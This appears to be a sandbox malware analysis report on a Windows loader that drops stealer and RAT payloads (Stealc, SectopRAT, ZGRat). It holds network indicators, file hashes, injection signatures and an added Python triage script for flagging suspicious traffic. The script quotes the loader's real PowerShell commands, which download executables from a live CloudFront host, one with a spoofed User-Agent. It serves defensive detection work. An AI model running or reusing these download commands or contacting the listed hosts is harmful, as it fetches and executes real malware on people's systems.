NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
US 8.8.8.8:53 240216234727901.mjj.xne26.cfd udp
BG 94.156.35.76:80 240216234727901.mjj.xne26.cfd tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 note.padd.cn.com udp
RO 176.97.76.106:80 note.padd.cn.com tcp
DE 185.172.128.76:80 185.172.128.76 tcp
US 8.8.8.8:53 dsepc5ud74wta.cloudfront.net udp
NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
US 8.8.8.8:53 monoblocked.com udp
RU 45.130.41.108:443 monoblocked.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.190.80:80 apps.identrust.com tcp
US 8.8.8.8:53 c.574859385.xyz udp
GB 37.221.125.202:443 c.574859385.xyz tcp
GB 37.221.125.202:443 c.574859385.xyz tcp
DE 185.172.128.228:80 185.172.128.228 tcp
RU 91.215.85.66:15647 N/A tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 download.iolo.net udp
FR 185.93.2.244:80 download.iolo.net tcp
RU 91.215.85.66:15647 N/A tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
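The Processes and Network sections together carry the loader's first-stage indicators: four WebClient download cradles to one CloudFront distribution, one of them setting an InnoDownloadPlugin User-Agent to blend in with installer traffic, plus direct-to-IP HTTP to 185.172.128.0/24 hosts, a TCP connection on port 15647 with no hostname at all, and a paste site. The Python below is an added example, not part of the report: it pulls URLs, saved filenames and User-Agent strings out of the command lines above and flags the network rows an analyst would pivot on. The command lines and network rows are copied from this report; the CRYPTOAPI_BACKGROUND allowlist (hosts Windows contacts for root and revocation fetches, consistent with the CryptnetUrlCache files listed below) and the flag names are the example's own assumptions.

```python
import re
from urllib.parse import urlparse

# Command lines copied from the report's Processes section for behavioral1.
COMMAND_LINES = r'''
"C:\Users\Admin\AppData\Local\Temp\file.exe"
"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nst199A.tmp\load.bat"
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/th.php?c=1000','stat')"
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
i1.exe /SUB=28381000 /str=one
powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=444', 'i2.bat')"
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=456','i3.exe')"
'''.strip().splitlines()

# A subset of the report's Network table; the 91.215.85.66 row has no Domain column.
NETWORK_ROWS = """
NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
DE 185.172.128.59:80 185.172.128.59 tcp
BG 94.156.35.76:80 240216234727901.mjj.xne26.cfd tcp
RO 176.97.76.106:80 note.padd.cn.com tcp
RU 45.130.41.108:443 monoblocked.com tcp
US 2.18.190.80:80 apps.identrust.com tcp
GB 37.221.125.202:443 c.574859385.xyz tcp
RU 91.215.85.66:15647 tcp
US 104.20.3.235:443 pastebin.com tcp
US 216.239.32.29:80 pki.goog tcp
FR 185.93.2.244:80 download.iolo.net tcp
"""

CRADLE_RE = re.compile(
    r"\.(DownloadFile|DownloadString|DownloadData)\(\s*'([^']+)'(?:\s*,\s*'([^']+)')?\s*\)", re.I)
UA_RE = re.compile(r"Headers\['User-Agent'\]\s*=\s*'([^']+)'", re.I)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
PASTE_SITES = {"pastebin.com"}
# Hosts Windows CryptoAPI contacts for root/CRL fetches; treating them as
# background noise is this example's assumption, not a finding of the report.
CRYPTOAPI_BACKGROUND = {"apps.identrust.com", "pki.goog", "www.microsoft.com"}
COMMON_PORTS = {53, 80, 443}


def extract_download_cradles(cmdlines):
    """WebClient download cradles in PowerShell command lines, with the
    User-Agent the script set (None when it kept the default)."""
    found = []
    for cmd in cmdlines:
        if "powershell" not in cmd.lower():
            continue
        ua = UA_RE.search(cmd)
        for m in CRADLE_RE.finditer(cmd):
            method, url, saved_as = m.groups()
            found.append({"method": method, "url": url, "host": urlparse(url).hostname,
                          "saved_as": saved_as, "user_agent": ua.group(1) if ua else None})
    return found


def parse_network(text):
    """(country, ip, port, domain_or_None, proto) per row; 3-field rows lack a domain."""
    rows = []
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            (country, dest, proto), domain = parts, None
        else:
            raise ValueError(f"unrecognised row: {line!r}")
        ip, port = dest.rsplit(":", 1)
        rows.append((country, ip, int(port), domain, proto))
    return rows


def triage_network(text):
    """Map 'ip:port' -> set of flags worth an analyst's attention."""
    flags = {}
    for _, ip, port, domain, proto in parse_network(text):
        f = flags.setdefault(f"{ip}:{port}", set())
        if domain is None or IPV4_RE.match(domain):
            f.add("raw-ip")
        if port not in COMMON_PORTS:
            f.add("uncommon-port")
        if domain in PASTE_SITES:
            f.add("paste-site")
        if domain in CRYPTOAPI_BACKGROUND:
            f.add("cryptoapi-background")
    return flags


def flagged(text, flag):
    return sorted(dest for dest, f in triage_network(text).items() if flag in f)


def summarize(cmdlines, network_text):
    cradles = extract_download_cradles(cmdlines)
    domains = {d for _, _, _, d, proto in parse_network(network_text)
               if d and proto == "tcp" and not IPV4_RE.match(d) and d not in CRYPTOAPI_BACKGROUND}
    return {
        "download_urls": [c["url"] for c in cradles],
        "spoofed_user_agents": sorted({c["user_agent"] for c in cradles if c["user_agent"]}),
        "contacted_domains": sorted(domains),
        "raw_ip_destinations": flagged(network_text, "raw-ip"),
        "uncommon_ports": flagged(network_text, "uncommon-port"),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(COMMAND_LINES, NETWORK_ROWS), indent=2))
```

The spoofed User-Agent is worth keeping as its own indicator: proxy logs will show InnoDownloadPlugin/1.5 fetching dl.php?id=444 from a process tree rooted in file.exe rather than in an Inno Setup installer.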

Files

\Users\Admin\AppData\Local\Temp\nst199A.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar2295.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 cdff232ba5f19245cb3051dbe343475b
SHA1 48c9413b74bde37f3bf74dd0f807bbf21b019bba
SHA256 9d6f08844e37d68931921fa518a4bf2af370d581d15a79609f463facfe768ab0
SHA512 dd03485119dbe18414ccaf9185759e7a6f1c9d942753a573900797c2d74c77c53608ac51773c0d4d4de02d41e2ea357900e703521431a80b48993696d8cd7ea9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 52176d063dcdb67592736cd7a6edec07
SHA1 de9775a58899fb218fc38981f5b082b7e8e5f5fc
SHA256 9fb136831780e33c6a600022072fca50448ac1e123224294213dade48489624a
SHA512 c8c56484277122d003044522b28cde8a9c7cd183e4ee4618db8cb1491bfcd6f05e0cf8abe73ef0c5678e2e67a327059dbe4490659b76de15e509a40eec7c1372

C:\Users\Admin\AppData\Local\Temp\nst199A.tmp\load.bat

MD5 c03b3682569c40524152ba0ea7bc25ff
SHA1 670c137c03ade8b573e4084c12dcb1d00e377c20
SHA256 70e43edb60c75270e41a167cfc5e6c1b60a0d022b57812560006626c3904353f
SHA512 9b0f33cf044beb3a9f558e8a09f99b263c2b617169fa036876043b5e85a92eb5f0a2ed31accad878486dfdaa144f8b780ea14378ac2e0d3b273cf6100515019a

memory/1072-168-0x0000000073C50000-0x00000000741FB000-memory.dmp

memory/1072-169-0x0000000073C50000-0x00000000741FB000-memory.dmp

memory/1072-172-0x0000000002AF0000-0x0000000002B30000-memory.dmp

memory/1072-171-0x0000000002AF0000-0x0000000002B30000-memory.dmp

memory/1072-170-0x0000000002AF0000-0x0000000002B30000-memory.dmp

memory/1072-173-0x0000000073C50000-0x00000000741FB000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 ac1b1bc5a0cadb408afba338d153f087
SHA1 c7e6145baa89ea358d5bc9456570645d0193a833
SHA256 ea37e030af3674aeaa393a3cbc8a8a3e1b2b564e28bf00c644f84e010cc86e3f
SHA512 7f2d9b03d2ab2ee3c8ec89ad07dfc237737e24195c67f42b9c71e5cdebe1d71e0162ddf0372bbc48352320f73fed61b86d7339f8cef4b0668fe57f23d8c609fe

memory/476-179-0x00000000736A0000-0x0000000073C4B000-memory.dmp

memory/476-180-0x0000000002D20000-0x0000000002D60000-memory.dmp

memory/476-181-0x00000000736A0000-0x0000000073C4B000-memory.dmp

memory/476-183-0x00000000736A0000-0x0000000073C4B000-memory.dmp

\Users\Admin\AppData\Local\Temp\i1.exe

MD5 ae73eb4cbe39e4a9e28a367331329a12
SHA1 fa827d6b4f9c94dd137fc24b201259a4c8293913
SHA256 5f302f2c568cfc3bef4f7690b84d15dd58caace21a60f76d807e909ff8f81e5e
SHA512 b8b28158002cdd797cfe9050d93ba7d3122ac9a6e308d60c13027546bcfde0fa17df38e980016c6bb91fec62b2b6a9acfc55b58a5983e2beab248aac469a9500

memory/1860-188-0x0000000004200000-0x0000000004300000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1860-190-0x0000000000230000-0x000000000029D000-memory.dmp

memory/352-196-0x0000000073C50000-0x00000000741FB000-memory.dmp

memory/352-197-0x0000000001FF0000-0x0000000002030000-memory.dmp

memory/352-198-0x0000000073C50000-0x00000000741FB000-memory.dmp

memory/352-199-0x0000000001FF0000-0x0000000002030000-memory.dmp

memory/352-200-0x0000000073C50000-0x00000000741FB000-memory.dmp

memory/2668-211-0x0000000002440000-0x0000000002441000-memory.dmp

\Users\Admin\AppData\Local\Temp\u1fo.0.exe

MD5 80e0fece33768e20034d106db0d36341
SHA1 ba12ccea1e640cdb5fedb0e9ac03aad09bdc9510
SHA256 8a6721d38d828ce4dbbef786174faf854f366b0bf6f07189033aafa53459a14e
SHA512 1292b73f6e0673a118ad726ab14dbcbbbe9d1245cac978e5752838b51cccabd4a286397faf7de27b98cd9ab88ea04fb46aa02ec3287d641b3056593f69606e7f

memory/1172-232-0x0000000004480000-0x0000000004580000-memory.dmp

memory/1172-233-0x0000000000220000-0x0000000000247000-memory.dmp

memory/1172-234-0x0000000000400000-0x000000000403C000-memory.dmp

memory/1688-243-0x00000000736A0000-0x0000000073C4B000-memory.dmp

memory/1688-244-0x0000000002A10000-0x0000000002A50000-memory.dmp

memory/1688-245-0x00000000736A0000-0x0000000073C4B000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fa5db95986bb9c7001ae113d70b3ae47
SHA1 589674e9127078d5ebbb8223ffb32ed66e422c1b
SHA256 0218489b7290909764e3cd262440af40bc99c56528bbc27d7f47ae9d7b0e576e
SHA512 49c3978137f41572a288806e209f8f806c296f11aba181accd2667a79e6c132d0277f2fcd08fa6047258958f927eee1262e5cbadfc372199bcd3b29d9325af78

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8a122a410326772e8f82875b217ebb1f
SHA1 7444ffdb59b0df6eba061740b6ae3d0bafaa3a4e
SHA256 bb3d7f0e516db8a5248e39e7aee3bc898736d6b3a7d9f02d7ce7af5d75c401b6
SHA512 cb8731b4f10c71780da9043c204b8f83850c961ed065cb51fbcf5c5d6821d55335d446d2feee2e7bdf3206f8964835412aac808c6397b54a77f683fcc2b2344d

memory/1860-321-0x0000000000400000-0x000000000405F000-memory.dmp

memory/1688-322-0x00000000736A0000-0x0000000073C4B000-memory.dmp

memory/1860-342-0x0000000004200000-0x0000000004300000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\U1FO1~1.ZIP

MD5 78d3ca6355c93c72b494bb6a498bf639
SHA1 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e
SHA256 a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001
SHA512 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea

\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe

MD5 9fb4770ced09aae3b437c1c6eb6d7334
SHA1 fe54b31b0db8665aa5b22bed147e8295afc88a03
SHA256 a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3
SHA512 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256

C:\Users\Admin\AppData\Local\Temp\u1fo.2\relay.dll

MD5 10d51becd0bbce0fab147ff9658c565e
SHA1 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a
SHA256 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed
SHA512 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29

C:\Users\Admin\AppData\Local\Temp\u1fo.2\whale.dbf

MD5 a723bf46048e0bfb15b8d77d7a648c3e
SHA1 8952d3c34e9341e4425571e10f22b782695bb915
SHA256 b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422
SHA512 ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273

C:\Users\Admin\AppData\Local\Temp\u1fo.2\bunch.dat

MD5 1e8237d3028ab52821d69099e0954f97
SHA1 30a6ae353adda0c471c6ed5b7a2458b07185abf2
SHA256 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742
SHA512 a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3

memory/2036-432-0x00000000747C0000-0x0000000074934000-memory.dmp

memory/2036-433-0x0000000077C10000-0x0000000077DB9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u1fo.2\UIxMarketPlugin.dll

MD5 d1ba9412e78bfc98074c5d724a1a87d6
SHA1 0572f98d78fb0b366b5a086c2a74cc68b771d368
SHA256 cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15
SHA512 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f

memory/2036-439-0x00000000747C0000-0x0000000074934000-memory.dmp

memory/1860-440-0x0000000000400000-0x000000000405F000-memory.dmp

memory/2036-441-0x00000000747C0000-0x0000000074934000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4e41388c

MD5 a3f64b0f4425cccfbe71b41931a1a3f4
SHA1 2fb9d9470c2e1052c226fcf2f2c06e7f35e3105c
SHA256 8d9a9385fc6af4cbba1ec2c2f07986200c88d5b038519ab08d234f48e2901ec3
SHA512 070a370f78fd432edc20f9bdb096f9522f716713b2d08e38389518043b4705f665aa7be34caedf8feaf8a475e1454bf8f4acb6c8f0ce90e3d793b248b9467d3a

memory/636-443-0x00000000747C0000-0x0000000074934000-memory.dmp

memory/636-445-0x0000000077C10000-0x0000000077DB9000-memory.dmp

memory/636-492-0x00000000747C0000-0x0000000074934000-memory.dmp

memory/636-493-0x00000000747C0000-0x0000000074934000-memory.dmp

memory/636-497-0x00000000747C0000-0x0000000074934000-memory.dmp

memory/2380-498-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2380-495-0x0000000073190000-0x00000000741F2000-memory.dmp

memory/2380-499-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2380-500-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2380-501-0x0000000072AA0000-0x000000007318E000-memory.dmp

memory/2380-502-0x0000000004CD0000-0x0000000004D10000-memory.dmp

memory/2380-505-0x0000000072AA0000-0x000000007318E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e82ed9131ad46b9025ff978fef4abd59
SHA1 8c68caa63d85144b4ff660e3a7b48f8865dd17e9
SHA256 ccb90805ec961324e7f29e4a1fce8649f757d7e69dbaf4a99b0b9fbbecb64473
SHA512 af55eedfaf9a2cbe1f6438881ba1553b8267574d49768fcd9ee5ff0a2a1cc828f023f681af62746ac66a16fa28416a3f93239e1bae9861cb1d00681d6bea1270

memory/2380-526-0x0000000004CD0000-0x0000000004D10000-memory.dmp

\Users\Admin\AppData\Local\Temp\u1fo.3.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/1860-544-0x0000000004200000-0x0000000004300000-memory.dmp

memory/1860-543-0x0000000000400000-0x000000000405F000-memory.dmp

memory/2464-545-0x0000000000230000-0x0000000000231000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 b7b3e8a8a18b027b4333feba64524a0a
SHA1 b55d040f683077b446c098bc87e320cde0d82a7a
SHA256 4877aaefb31817035e386aaa6d0550e4cd0a1a331f694dd0ffbb32a106389f34
SHA512 1c7358c1aab01eb891b078ac3d796600009fe0c47c7315a68b064af29bd2d82e1093f8829b23a0ee968ccad558916d2c74f77bfd2cc34149ef25f8ea75c0b561

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 3668218f4409c4ca5543d108ed16ed29
SHA1 88670b8be52cc341c721dd62b7ad36333fd37c5f
SHA256 a1f26152bdb5109ebac832e81c6a1491edec58dfea5af7bf5cc2942b5119a985
SHA512 05606270baa6655418df48f28b139a24be9caaf6ff5ed69e47f4431669064e895a3297a8a67b24650adfc750ad37d7567241dabe268352615fe21f678e4b612b

C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\a156d2ee87eeb3012aacff4fcc5518f7fa0b2caa0b97ad5a5e46c2e4fdf8c5f4\53c051f1d10c489198d14bef4e290887.tmp

MD5 9810559e8ca9cb1e9e1a5222797b7def
SHA1 0f244940a3f4df18b02a9064f264c8e203cbf885
SHA256 7d64187cf73ba0fbf6b691c8dca9f7eb52b557c7da23ecb96f5823189e389955
SHA512 dda14e433941d72ce88765066159ceb053a7da92ace08dd35dbd9d3ccefda4b9a651c8f42483689e2c49ede3499eb0d8d24f8d60f16675ea0694bb98a3e93ea1

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-26 09:05

Reported

2024-04-26 09:08

Platform

win10v2004-20240412-en

Max time kernel

149s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Stealc

stealer stealc

ZGRat

rat zgrat

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\i1.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3652 set thread context of 4836 N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 4836 set thread context of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
